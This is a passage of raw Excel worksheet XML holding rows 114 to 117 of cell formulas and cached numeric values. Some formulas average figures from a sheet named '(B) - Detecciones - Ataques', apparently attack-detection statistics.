      <c r="DF114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="DG114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="DH114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="DI114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="DJ114" s="519">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="DK114" s="271"/>
      <c r="DO114" s="279"/>
      <c r="DP114" s="271"/>
      <c r="DQ114" s="271"/>
      <c r="DR114" s="271"/>
      <c r="DS114" s="271"/>
      <c r="DT114" s="271"/>
      <c r="DU114" s="271"/>
      <c r="DV114" s="271"/>
      <c r="DW114" s="271"/>
      <c r="DX114" s="271"/>
      <c r="DY114" s="271"/>
      <c r="DZ114" s="271"/>
      <c r="EA114" s="271"/>
      <c r="EB114" s="271"/>
      <c r="EC114" s="271"/>
      <c r="ED114" s="280"/>
      <c r="EG114" s="279"/>
      <c r="EH114" s="271"/>
      <c r="EI114" s="271"/>
      <c r="EJ114" s="271"/>
      <c r="EK114" s="271"/>
      <c r="EL114" s="271"/>
      <c r="EM114" s="271"/>
      <c r="ER114" s="271"/>
      <c r="ES114" s="271"/>
      <c r="ET114" s="271"/>
      <c r="EU114" s="271"/>
      <c r="EV114" s="271"/>
      <c r="EW114" s="271"/>
      <c r="EX114" s="271"/>
      <c r="EY114" s="271"/>
      <c r="EZ114" s="271"/>
      <c r="FA114" s="280"/>
    </row>
    <row r="115">
      <c r="J115" s="277"/>
      <c r="K115" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BO3:BO139)</f>
        <v>75.29745389</v>
      </c>
      <c r="L115" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DE3:DE139)</f>
        <v>2413.428304</v>
      </c>
      <c r="M115" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EU3:EU139)</f>
        <v>2469.252832</v>
      </c>
      <c r="N115" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GK3:GK139)</f>
        <v>5655.350213</v>
      </c>
      <c r="O115" s="278"/>
      <c r="Q115" s="271"/>
      <c r="R115" s="352" t="s">
        <v>2587</v>
      </c>
      <c r="S115" s="501">
        <f t="shared" ref="S115:V115" si="160">IF(S$35=0,"-",S67/S$35)</f>
        <v>0.01355275895</v>
      </c>
      <c r="T115" s="501" t="str">
        <f t="shared" si="160"/>
        <v>-</v>
      </c>
      <c r="U115" s="501">
        <f t="shared" si="160"/>
        <v>0.8968253968</v>
      </c>
      <c r="V115" s="501">
        <f t="shared" si="160"/>
        <v>0.8947368421</v>
      </c>
      <c r="W115" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X115" s="501">
        <f t="shared" ref="X115:AF115" si="161">IF(X$35=0,"-",X67/X$35)</f>
        <v>0.3636363636</v>
      </c>
      <c r="Y115" s="501">
        <f t="shared" si="161"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z115" s="501">
        <f t="shared" si="161"/>
        <v>0.06833471026</v>
      </c>
      <c r="AA115" s="501">
        <f t="shared" si="161"/>
        <v>0.9855907781</v>
      </c>
      <c r="AB115" s="501">
        <f t="shared" si="161"/>
        <v>0.8260869565</v>
      </c>
      <c r="AC115" s="501">
        <f t="shared" si="161"/>
        <v>0.8</v>
      </c>
      <c r="AD115" s="501">
        <f t="shared" si="161"/>
        <v>0.005970149254</v>
      </c>
      <c r="AE115" s="501">
        <f t="shared" si="161"/>
        <v>0.25</v>
      </c>
      <c r="AF115" s="502">
        <f t="shared" si="161"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG115" s="271"/>
      <c r="AH115" s="352" t="s">
        <v>2587</v>
      </c>
      <c r="AI115" s="518">
        <f t="shared" ref="AI115:DJ115" si="162">IF(AI$30=0,"-",AI67/AI$31)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="AK115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="AL115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="AM115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="AN115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="AO115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="AP115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="AQ115" s="518">
        <f t="shared" si="162"/>
        <v>0.9230769231</v>
      </c>
      <c r="AR115" s="518">
        <f t="shared" si="162"/>
        <v>0.25</v>
      </c>
      <c r="AS115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="AT115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="AU115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="AV115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="AW115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="AX115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="AY115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="AZ115" s="518">
        <f t="shared" si="162"/>
        <v>0.5</v>
      </c>
      <c r="BA115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BB115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BC115" s="518">
        <f t="shared" si="162"/>
        <v>0.6666666667</v>
      </c>
      <c r="BD115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BE115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="BF115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BG115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="BH115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BI115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BJ115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BK115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BL115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="BM115" s="518">
        <f t="shared" si="162"/>
        <v>0.1725394897</v>
      </c>
      <c r="BN115" s="518">
        <f t="shared" si="162"/>
        <v>0.001930501931</v>
      </c>
      <c r="BO115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BP115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BQ115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="BR115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BS115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="BT115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BU115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BV115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="BW115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="BX115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="BY115" s="518">
        <f t="shared" si="162"/>
        <v>0.8888888889</v>
      </c>
      <c r="BZ115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CA115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="CB115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CC115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CD115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CE115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="CF115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CG115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CH115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CI115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CJ115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CK115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CL115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="CM115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CN115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CO115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CP115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="CQ115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CR115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="CS115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CT115" s="518">
        <f t="shared" si="162"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="CV115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CW115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="CX115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="CY115" s="518">
        <f t="shared" si="162"/>
        <v>0.05882352941</v>
      </c>
      <c r="CZ115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="DA115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="DB115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="DC115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="DD115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="DE115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="DF115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="DG115" s="518" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="DH115" s="518">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="DI115" s="518">
        <f t="shared" si="162"/>
        <v>0</v>
      </c>
      <c r="DJ115" s="519">
        <f t="shared" si="162"/>
        <v>1</v>
      </c>
      <c r="DK115" s="271"/>
      <c r="DO115" s="279"/>
      <c r="DP115" s="271"/>
      <c r="DQ115" s="271"/>
      <c r="DR115" s="271"/>
      <c r="DS115" s="271"/>
      <c r="DT115" s="271"/>
      <c r="DU115" s="271"/>
      <c r="DV115" s="271"/>
      <c r="DW115" s="271"/>
      <c r="DX115" s="271"/>
      <c r="DY115" s="271"/>
      <c r="DZ115" s="271"/>
      <c r="EA115" s="271"/>
      <c r="EB115" s="271"/>
      <c r="EC115" s="271"/>
      <c r="ED115" s="280"/>
      <c r="EG115" s="279"/>
      <c r="EH115" s="271"/>
      <c r="EI115" s="271"/>
      <c r="EJ115" s="271"/>
      <c r="EK115" s="271"/>
      <c r="EL115" s="271"/>
      <c r="EM115" s="271"/>
      <c r="ER115" s="271"/>
      <c r="ES115" s="271"/>
      <c r="ET115" s="271"/>
      <c r="EU115" s="271"/>
      <c r="EV115" s="271"/>
      <c r="EW115" s="271"/>
      <c r="EX115" s="271"/>
      <c r="EY115" s="271"/>
      <c r="EZ115" s="271"/>
      <c r="FA115" s="280"/>
    </row>
    <row r="116">
      <c r="J116" s="277"/>
      <c r="K116" s="434"/>
      <c r="L116" s="353"/>
      <c r="M116" s="353"/>
      <c r="N116" s="354"/>
      <c r="O116" s="278"/>
      <c r="Q116" s="271"/>
      <c r="R116" s="352" t="s">
        <v>2588</v>
      </c>
      <c r="S116" s="501">
        <f t="shared" ref="S116:V116" si="163">S68/S$31</f>
        <v>0.7384637958</v>
      </c>
      <c r="T116" s="501">
        <f t="shared" si="163"/>
        <v>0.01424340292</v>
      </c>
      <c r="U116" s="501">
        <f t="shared" si="163"/>
        <v>0.126984127</v>
      </c>
      <c r="V116" s="501">
        <f t="shared" si="163"/>
        <v>0.4210526316</v>
      </c>
      <c r="W116" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X116" s="501">
        <f t="shared" ref="X116:AF116" si="164">X68/X$31</f>
        <v>0.09090909091</v>
      </c>
      <c r="Y116" s="501">
        <f t="shared" si="164"/>
        <v>113.1428571</v>
      </c>
      <c r="Z116" s="501">
        <f t="shared" si="164"/>
        <v>0.9009795822</v>
      </c>
      <c r="AA116" s="501">
        <f t="shared" si="164"/>
        <v>0.07204610951</v>
      </c>
      <c r="AB116" s="501">
        <f t="shared" si="164"/>
        <v>0.8695652174</v>
      </c>
      <c r="AC116" s="501">
        <f t="shared" si="164"/>
        <v>2.4</v>
      </c>
      <c r="AD116" s="501">
        <f t="shared" si="164"/>
        <v>0.02427603204</v>
      </c>
      <c r="AE116" s="501">
        <f t="shared" si="164"/>
        <v>2.208333333</v>
      </c>
      <c r="AF116" s="502">
        <f t="shared" si="164"/>
        <v>0.001650021711</v>
      </c>
      <c r="AG116" s="271"/>
      <c r="AH116" s="352" t="s">
        <v>2588</v>
      </c>
      <c r="AI116" s="518">
        <f t="shared" ref="AI116:DJ116" si="165">IF(AI$30=0,"-",AI68/AI$31)</f>
        <v>0.7386422018</v>
      </c>
      <c r="AJ116" s="518">
        <f t="shared" si="165"/>
        <v>1</v>
      </c>
      <c r="AK116" s="518">
        <f t="shared" si="165"/>
        <v>0.25</v>
      </c>
      <c r="AL116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AM116" s="518">
        <f t="shared" si="165"/>
        <v>0.01424340292</v>
      </c>
      <c r="AN116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="AO116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="AP116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="AQ116" s="518">
        <f t="shared" si="165"/>
        <v>0.02564102564</v>
      </c>
      <c r="AR116" s="518">
        <f t="shared" si="165"/>
        <v>1</v>
      </c>
      <c r="AS116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="AT116" s="518">
        <f t="shared" si="165"/>
        <v>3</v>
      </c>
      <c r="AU116" s="518">
        <f t="shared" si="165"/>
        <v>2</v>
      </c>
      <c r="AV116" s="518">
        <f t="shared" si="165"/>
        <v>1</v>
      </c>
      <c r="AW116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="AX116" s="518">
        <f t="shared" si="165"/>
        <v>0.5</v>
      </c>
      <c r="AY116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="AZ116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BA116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BB116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BC116" s="518">
        <f t="shared" si="165"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BE116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BF116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BG116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BH116" s="518">
        <f t="shared" si="165"/>
        <v>792</v>
      </c>
      <c r="BI116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BJ116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BK116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BL116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BM116" s="518">
        <f t="shared" si="165"/>
        <v>0.1998784933</v>
      </c>
      <c r="BN116" s="518">
        <f t="shared" si="165"/>
        <v>1.346718147</v>
      </c>
      <c r="BO116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BP116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BQ116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BR116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BS116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BT116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BU116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BV116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BW116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="BX116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="BY116" s="518">
        <f t="shared" si="165"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ116" s="518">
        <f t="shared" si="165"/>
        <v>0.162601626</v>
      </c>
      <c r="CA116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CB116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CC116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CD116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CE116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CF116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CG116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CH116" s="518">
        <f t="shared" si="165"/>
        <v>1</v>
      </c>
      <c r="CI116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CJ116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CK116" s="518">
        <f t="shared" si="165"/>
        <v>8</v>
      </c>
      <c r="CL116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CM116" s="518">
        <f t="shared" si="165"/>
        <v>1.5</v>
      </c>
      <c r="CN116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CO116" s="518">
        <f t="shared" si="165"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP116" s="518">
        <f t="shared" si="165"/>
        <v>11.5</v>
      </c>
      <c r="CQ116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CR116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CS116" s="518">
        <f t="shared" si="165"/>
        <v>0.02458697765</v>
      </c>
      <c r="CT116" s="518">
        <f t="shared" si="165"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CV116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CW116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CX116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="CY116" s="518">
        <f t="shared" si="165"/>
        <v>2.823529412</v>
      </c>
      <c r="CZ116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="DA116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="DB116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="DC116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="DD116" s="518">
        <f t="shared" si="165"/>
        <v>5</v>
      </c>
      <c r="DE116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="DF116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="DG116" s="518" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="DH116" s="518">
        <f t="shared" si="165"/>
        <v>0.04</v>
      </c>
      <c r="DI116" s="518">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="DJ116" s="519">
        <f t="shared" si="165"/>
        <v>0.09090909091</v>
      </c>
      <c r="DK116" s="271"/>
      <c r="DO116" s="279"/>
      <c r="DP116" s="271"/>
      <c r="DQ116" s="271"/>
      <c r="DR116" s="271"/>
      <c r="DS116" s="271"/>
      <c r="DT116" s="271"/>
      <c r="DU116" s="271"/>
      <c r="DV116" s="271"/>
      <c r="DW116" s="271"/>
      <c r="DX116" s="271"/>
      <c r="DY116" s="271"/>
      <c r="DZ116" s="271"/>
      <c r="EA116" s="271"/>
      <c r="EB116" s="271"/>
      <c r="EC116" s="271"/>
      <c r="ED116" s="280"/>
      <c r="EG116" s="279"/>
      <c r="EH116" s="271"/>
      <c r="EI116" s="271"/>
      <c r="EJ116" s="271"/>
      <c r="EK116" s="271"/>
      <c r="EL116" s="271"/>
      <c r="EM116" s="271"/>
      <c r="ER116" s="271"/>
      <c r="ES116" s="271"/>
      <c r="ET116" s="271"/>
      <c r="EU116" s="271"/>
      <c r="EV116" s="271"/>
      <c r="EW116" s="271"/>
      <c r="EX116" s="271"/>
      <c r="EY116" s="271"/>
      <c r="EZ116" s="271"/>
      <c r="FA116" s="280"/>
    </row>
    <row r="117">
      <c r="J117" s="277"/>
      <c r="K117" s="352" t="s">
        <v>2570</v>
      </c>
      <c r="L117" s="403" t="s">
        <v>2571</v>
      </c>
      <c r="M117" s="403" t="s">
        <v>2572</v>
      </c>
      <c r="N117" s="404" t="s">
        <v>2573</v>
      </c>
      <c r="O117" s="278"/>
      <c r="Q117" s="271"/>
      <c r="R117" s="352" t="s">
        <v>2589</v>
      </c>
      <c r="S117" s="501">
        <f t="shared" ref="S117:V117" si="166">S69/S$31</f>
        <v>0.00249431443</v>
      </c>
      <c r="T117" s="501">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="U117" s="501">
        <f t="shared" si="166"/>
        <v>1.444444444</v>
      </c>
      <c r="V117" s="501">
        <f t="shared" si="166"/>
        <v>3.210526316</v>
      </c>
      <c r="W117" s="501">
        <f t="shared" si="104"/>
        <v>14</v>
      </c>
      <c r="X117" s="501">
        <f t="shared" ref="X117:AF117" si="167">X69/X$31</f>
        <v>0.09090909091</v>
      </c>
      <c r="Y117" s="501">
        <f t="shared" si="167"/>
        <v>115.8571429</v>
      </c>
      <c r="Z117" s="501">
        <f t="shared" si="167"/>
        <v>18.85152838</v>
      </c>
      <c r="AA117" s="501">
        <f t="shared" si="167"/>
        <v>0.1469740634</v>
      </c>
      <c r="AB117" s="501">
        <f t="shared" si="167"/>
        <v>9.652173913</v>
      </c>
      <c r="AC117" s="501">
        <f t="shared" si="167"/>
        <v>5.1</v>
      </c>
      <c r="AD117" s="501">
        <f t="shared" si="167"/>
        <v>0.0002053809817</v>
      </c>
      <c r="AE117" s="501">
        <f t="shared" si="167"/>
        <v>2.541666667</v>
      </c>
      <c r="AF117" s="502">
        <f t="shared" si="167"/>
        <v>0.5217542336</v>
      </c>
      <c r="AG117" s="271"/>
      <c r="AH117" s="352" t="s">
        <v>2589</v>
      </c>
      <c r="AI117" s="518">
        <f t="shared" ref="AI117:DJ117" si="168">IF(AI$30=0,"-",AI69/AI$31)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ117" s="518">
        <f t="shared" si="168"/>
        <v>1</v>
      </c>
      <c r="AK117" s="518">
        <f t="shared" si="168"/>
        <v>2.5</v>
      </c>
      <c r="AL117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AM117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AN117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="AO117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="AP117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="AQ117" s="518">
        <f t="shared" si="168"/>
        <v>1.393162393</v>
      </c>
      <c r="AR117" s="518">
        <f t="shared" si="168"/>
        <v>1.25</v>
      </c>
      <c r="AS117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="AT117" s="518">
        <f t="shared" si="168"/>
        <v>3</v>
      </c>
      <c r="AU117" s="518">
        <f t="shared" si="168"/>
        <v>3.5</v>
      </c>
      <c r="AV117" s="518">
        <f t="shared" si="168"/>
        <v>2</v>
      </c>
      <c r="AW117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="AX117" s="518">
        <f t="shared" si="168"/>
        <v>2.875</v>
      </c>
      <c r="AY117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="AZ117" s="518">
        <f t="shared" si="168"/>
        <v>0.5</v>
      </c>
      <c r="BA117" s="518">
        <f t="shared" si="168"/>
        <v>14</v>
      </c>
      <c r="BB117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BC117" s="518">
        <f t="shared" si="168"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BE117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BF117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BG117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BH117" s="518">
        <f t="shared" si="168"/>
        <v>792</v>
      </c>
      <c r="BI117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BJ117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BK117" s="518">
        <f t="shared" si="168"/>
        <v>6.333333333</v>
      </c>
      <c r="BL117" s="518">
        <f t="shared" si="168"/>
        <v>1</v>
      </c>
      <c r="BM117" s="518">
        <f t="shared" si="168"/>
        <v>45.68074119</v>
      </c>
      <c r="BN117" s="518">
        <f t="shared" si="168"/>
        <v>1.804440154</v>
      </c>
      <c r="BO117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BP117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BQ117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BR117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BS117" s="518">
        <f t="shared" si="168"/>
        <v>6</v>
      </c>
      <c r="BT117" s="518">
        <f t="shared" si="168"/>
        <v>2</v>
      </c>
      <c r="BU117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BV117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BW117" s="518">
        <f t="shared" si="168"/>
        <v>4</v>
      </c>
      <c r="BX117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="BY117" s="518">
        <f t="shared" si="168"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ117" s="518">
        <f t="shared" si="168"/>
        <v>0.162601626</v>
      </c>
      <c r="CA117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="CB117" s="518">
        <f t="shared" si="168"/>
        <v>1</v>
      </c>
      <c r="CC117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CD117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CE117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="CF117" s="518">
        <f t="shared" si="168"/>
        <v>4</v>
      </c>
      <c r="CG117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CH117" s="518">
        <f t="shared" si="168"/>
        <v>1</v>
      </c>
      <c r="CI117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CJ117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CK117" s="518">
        <f t="shared" si="168"/>
        <v>13</v>
      </c>
      <c r="CL117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="CM117" s="518">
        <f t="shared" si="168"/>
        <v>81</v>
      </c>
      <c r="CN117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CO117" s="518">
        <f t="shared" si="168"/>
        <v>1.333333333</v>
      </c>
      <c r="CP117" s="518">
        <f t="shared" si="168"/>
        <v>20</v>
      </c>
      <c r="CQ117" s="518">
